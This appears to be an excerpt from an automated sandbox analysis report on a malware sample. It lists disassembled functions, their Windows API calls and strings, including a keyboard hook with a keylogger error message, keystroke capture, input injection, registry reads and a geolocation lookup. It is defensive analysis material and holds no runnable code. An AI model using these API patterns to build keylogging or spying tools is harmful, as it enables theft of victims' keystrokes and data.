                                • Instruction Fuzzy Hash: B2B13975A016199BEB24DF18C884BAEB7B4FF08308F5045EEE949A7351E774AE90CF44
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041490A Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: tcp$udp
                                • API String ID: 0-3725065008
                                • Opcode ID: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                • Instruction ID: c6aeaafd44a905d145cb4251883953767b251f71b123717361be5a5837da4da2
                                • Opcode Fuzzy Hash: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                • Instruction Fuzzy Hash: 637177B06083028FDB24CF65C480BABB7E4AFD4395F15442FF88986351E778DD858B9A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00407963 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FA4,?,00000000,00407FFC,00000000), ref: 004079C5
                                • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A0D
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                • CloseHandle.KERNEL32(00000000,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A4D
                                • MoveFileW.KERNEL32(00000000,00000000), ref: 00407A6A
                                • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407A95
                                • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5
                                  • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,00404C49,00000000,00000000,00000000,?,00474EF8,?), ref: 00404BA5
                                  • Part of subcall function 00404B96: SetEvent.KERNEL32(00000000), ref: 00404BC3
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                • String ID: .part
                                • API String ID: 1303771098-3499674018
                                • Opcode ID: e279c082a0d0910cbf5de12e36227e1aa9d15681696cbfcdd7b3720dc44f8cc2
                                • Instruction ID: 3872d967715c28256f57216ae0d43a20e9ded80e7ed52efebe816600842ab993
                                • Opcode Fuzzy Hash: e279c082a0d0910cbf5de12e36227e1aa9d15681696cbfcdd7b3720dc44f8cc2
                                • Instruction Fuzzy Hash: 7F318371508341AFC210EB21DC4599FB7A8FF94359F00493EB545A2192EB78EE48CB9A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040A2B8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63windowCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
                                • SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
                                • GetLastError.KERNEL32 ref: 0040A2ED
                                  • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040A33B
                                • TranslateMessage.USER32(?), ref: 0040A34A
                                • DispatchMessageA.USER32(?), ref: 0040A355
                                Strings
                                • Keylogger initialization failure: error , xrefs: 0040A301
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                • String ID: Keylogger initialization failure: error
                                • API String ID: 3219506041-952744263
                                • Opcode ID: a226280b9444fdc9d85a987e0cc9a01563434beb77e8bedbb690ae4a652fbc74
                                • Instruction ID: 26c2bdf112627336efb266b6f5317542b4ef4d62b82d8858756ad59ca9dca42a
                                • Opcode Fuzzy Hash: a226280b9444fdc9d85a987e0cc9a01563434beb77e8bedbb690ae4a652fbc74
                                • Instruction Fuzzy Hash: FA11BF32604301ABCB107F76DC0A86B77ECEA95716B10457EFC85E21D1EA38C910CBAA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040A3E0 Relevance: 12.1, APIs: 8, Instructions: 112keyboardthreadCOMMON
                                Download Yara Rule
                                APIs
                                • GetForegroundWindow.USER32 ref: 0040A416
                                • GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A422
                                • GetKeyboardLayout.USER32(00000000), ref: 0040A429
                                • GetKeyState.USER32(00000010), ref: 0040A433
                                • GetKeyboardState.USER32(?), ref: 0040A43E
                                • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A461
                                • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4C1
                                • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 0040A4FA
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                • String ID:
                                • API String ID: 1888522110-0
                                • Opcode ID: 4ba0a60493bf1cb7a04a280161e9af6e0206db9f66fbe83c406a8642f04fa518
                                • Instruction ID: 5ff565fa5b8df07833abad56ec5ecbabe923af01fc99f1944a330f9e709d98a3
                                • Opcode Fuzzy Hash: 4ba0a60493bf1cb7a04a280161e9af6e0206db9f66fbe83c406a8642f04fa518
                                • Instruction Fuzzy Hash: AE316D72504308FFD710DF94DC45F9BB7ECAB88705F01083AB645D61A0E7B5E9488BA6
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00419993 Relevance: 12.1, APIs: 8, Instructions: 102keyboardCOMMON
                                Download Yara Rule
                                APIs
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 004199CC
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004199ED
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A0D
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A21
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A37
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A54
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A6F
                                • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00419A8B
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: InputSend
                                • String ID:
                                • API String ID: 3431551938-0
                                • Opcode ID: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                • Instruction ID: babcb3f23bbfeda7ed9031f98f3524dfd9ae94bb4b0c65128b251ed995bccade
                                • Opcode Fuzzy Hash: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                • Instruction Fuzzy Hash: CE31B471558349AEE310CF51DC41BEBBBDCEF98B54F00080FF6808A181D2A6A9C88B97
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00447571 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: __freea$__alloca_probe_16_free
                                • String ID: a/p$am/pm$zD
                                • API String ID: 2936374016-2723203690
                                • Opcode ID: ad0e661e8ca139f4988ec10911a06b569de76af7a8f23a444d27c6a0fba4a5cb
                                • Instruction ID: 9fbfa546a4d6e8c17a1525f8bb1fcc11d6b56032d3bbc67104e2604220ae0e85
                                • Opcode Fuzzy Hash: ad0e661e8ca139f4988ec10911a06b569de76af7a8f23a444d27c6a0fba4a5cb
                                • Instruction Fuzzy Hash: 6AD1D1B1918206CAFB249F68C845ABBB7B1FF05310F28415BE545AB351D33D9D43CBA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00449190 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • _free.LIBCMT ref: 00449212
                                • _free.LIBCMT ref: 00449236
                                • _free.LIBCMT ref: 004493BD
                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                • _free.LIBCMT ref: 00449589
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                • String ID:
                                • API String ID: 314583886-0
                                • Opcode ID: a76c1c50f6247d6f477dd4f5516cace97548eaaec76019f05838640eec6fad56
                                • Instruction ID: 779aab753f07af14b01adf3fce5c8211df4e7f9331a35af1166ddbde82723190
                                • Opcode Fuzzy Hash: a76c1c50f6247d6f477dd4f5516cace97548eaaec76019f05838640eec6fad56
                                • Instruction Fuzzy Hash: CAC15771900205ABFB24DF69CC41AAFBBA8EF46314F1405AFE89497381E7788E42D758
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00413A55 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 179registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
                                • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413B8B
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Enum$InfoQueryValue
                                • String ID: [regsplt]$xUG$TG
                                • API String ID: 3554306468-1165877943
                                • Opcode ID: 93e1897ebdc99b88186db92230c2e95498abfdd16b02543cd39a55fa0a109888
                                • Instruction ID: b9c9d149d6e4de0395087b00820169330fa190b61d8fc59f93bff107e3475f49
                                • Opcode Fuzzy Hash: 93e1897ebdc99b88186db92230c2e95498abfdd16b02543cd39a55fa0a109888
                                • Instruction Fuzzy Hash: E5511D72900219AADB11EB95DC85EEFB77DAF04305F10007AF505F6191EF786B48CBA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0045112C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 110COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • MultiByteToWideChar.KERNEL32(?,00000000,000000FF,?,00000000,00000000,0043F8C8,?,00000000,?,00000001,?,000000FF,00000001,0043F8C8,?), ref: 00451179
                                • __alloca_probe_16.LIBCMT ref: 004511B1
                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00451202
                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00451214
                                • __freea.LIBCMT ref: 0045121D
                                  • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                • String ID: PkGNG
                                • API String ID: 313313983-263838557
                                • Opcode ID: bce85a8c1b82420839f42ccd06a1f385e5b5f24b7ce490b3fee2b1b7615d4ae7
                                • Instruction ID: 2862a929c21554b3885a63a70f5d1b49ed21d23a3953ed9914841bfcf42aa681
                                • Opcode Fuzzy Hash: bce85a8c1b82420839f42ccd06a1f385e5b5f24b7ce490b3fee2b1b7615d4ae7
                                • Instruction Fuzzy Hash: 6631D271A0020AABDF24DFA5DC41EAF7BA5EB04315F0445AAFC04D72A2E739CD55CB94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041B68A Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 91COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0041361B: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 0041363D
                                  • Part of subcall function 0041361B: RegQueryValueExW.ADVAPI32(?,0040F313,00000000,00000000,?,00000400), ref: 0041365C
                                  • Part of subcall function 0041361B: RegCloseKey.ADVAPI32(?), ref: 00413665
                                  • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                  • Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF
                                • _wcslen.LIBCMT ref: 0041B763
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                • String ID: .exe$8SG$http\shell\open\command$program files (x86)\$program files\
                                • API String ID: 3286818993-122982132
                                • Opcode ID: ff64268ecf0c31a6c4424bc126999b380d0383f46c80c29dc48f1e307bbff0a4
                                • Instruction ID: 0af867b59be632d30c611c6dccf556baefac66a2e67262e696d3f692bc65d575
                                • Opcode Fuzzy Hash: ff64268ecf0c31a6c4424bc126999b380d0383f46c80c29dc48f1e307bbff0a4
                                • Instruction Fuzzy Hash: 6721A472A002086BDB14BAB58CD6AFE766D9B85328F14043FF405B72C2EE7C9D494269
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00456B53 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 273ab8544d097714f5f9861dee4502037fec93a611cdb24e761043779f074d75
                                • Instruction ID: 6cb1fb7365923ae9cd4386fa22a0d7cc2d4bdc50975796c61f51bb0de8f74700
                                • Opcode Fuzzy Hash: 273ab8544d097714f5f9861dee4502037fec93a611cdb24e761043779f074d75
                                • Instruction Fuzzy Hash: B9110272504214BAEB216F728C0496F3AACEF85326B52422BFD11C7252DE38CC41CAA8
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041B380 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 69networkfileCOMMON
                                Download Yara Rule
                                APIs
                                • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041B3A7
                                • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041B3BD
                                • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041B3D6
                                • InternetCloseHandle.WININET(00000000), ref: 0041B41C
                                • InternetCloseHandle.WININET(00000000), ref: 0041B41F
                                Strings
                                • http://geoplugin.net/json.gp, xrefs: 0041B3B7
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Internet$CloseHandleOpen$FileRead
                                • String ID: http://geoplugin.net/json.gp
                                • API String ID: 3121278467-91888290
                                • Opcode ID: 1e9fec68a0fa9a491aeb73d0e269fc382ae80b43ef1841fb67e99dd13ca0ad51
                                • Instruction ID: bc766ab0241d3587a1949f89688fbc1c60562a782fd7f61c1deed4db1e92f461
                                • Opcode Fuzzy Hash: 1e9fec68a0fa9a491aeb73d0e269fc382ae80b43ef1841fb67e99dd13ca0ad51
                                • Instruction Fuzzy Hash: E711EB311053126BD224AB269C49EBF7F9CEF86755F00043EF905A2292DB68DC45C6FA
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00411163 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                Download Yara Rule
                                APIs
                                • std::_Lockit::_Lockit.LIBCPMT ref: 00411170
                                • int.LIBCPMT ref: 00411183
                                  • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                  • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                • std::_Facet_Register.LIBCPMT ref: 004111C3
                                • std::_Lockit::~_Lockit.LIBCPMT ref: 004111CC
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 004111EA
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                • String ID: (mG
                                • API String ID: 2536120697-4059303827
                                • Opcode ID: 34a51a48ebffab58c1c893f3ae79879d0a70666fb45cbfefdea1ee74b3510b9f
                                • Instruction ID: 9d9da6683174d9a5c92fa95d325e3547e0845688fcbb555b93a4fb26f280994d
                                • Opcode Fuzzy Hash: 34a51a48ebffab58c1c893f3ae79879d0a70666fb45cbfefdea1ee74b3510b9f
                                • Instruction Fuzzy Hash: 1411EB32900518A7CB14BB9AD8058DEBB79DF44354F10456FBE04A72D1DB789D40C7D9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041B2C3 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                  • Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF
                                  • Part of subcall function 004135A6: RegOpenKeyExA.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004135CA
                                  • Part of subcall function 004135A6: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000400), ref: 004135E7
                                  • Part of subcall function 004135A6: RegCloseKey.ADVAPI32(?), ref: 004135F2
                                • StrToIntA.SHLWAPI(00000000,0046C9F8,00000000,00000000,00000000,004750E4,00000003,Exe,00000000,0000000E,00000000,004660BC,00000003,00000000), ref: 0041B33C
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.2066569876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.2066556855.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066602157.0000000000459000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000471000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066621301.0000000000474000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.2066650317.0000000000478000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_svcs.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CloseCurrentOpenQueryValueWow64
                                • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                • API String ID: 782494840-2070987746
                                • Opcode ID: f4059261ec9105722489d9fd436038e764cf76dffb1ecded69b4c09404498de6
                                • Instruction ID: 0537cd1ef0e49ffa1b211e53375311a7de90e31f2ded896f28e78de68f6ce99c
                                • Opcode Fuzzy Hash: f4059261ec9105722489d9fd436038e764cf76dffb1ecded69b4c09404498de6
                                • Instruction Fuzzy Hash: 42112370A4010566C704B3668C87EFF77198B95314F94013BF856A21E2FB6C599683AE
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0043A35A Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetLastError.KERNEL32(?,?,0043A351,004392BE), ref: 0043A368
                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A376
                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A38F
                                • SetLastError.KERNEL32(00000000,?,0043A351,004392BE), ref: 0043A3E1
                                Memory Dump Source
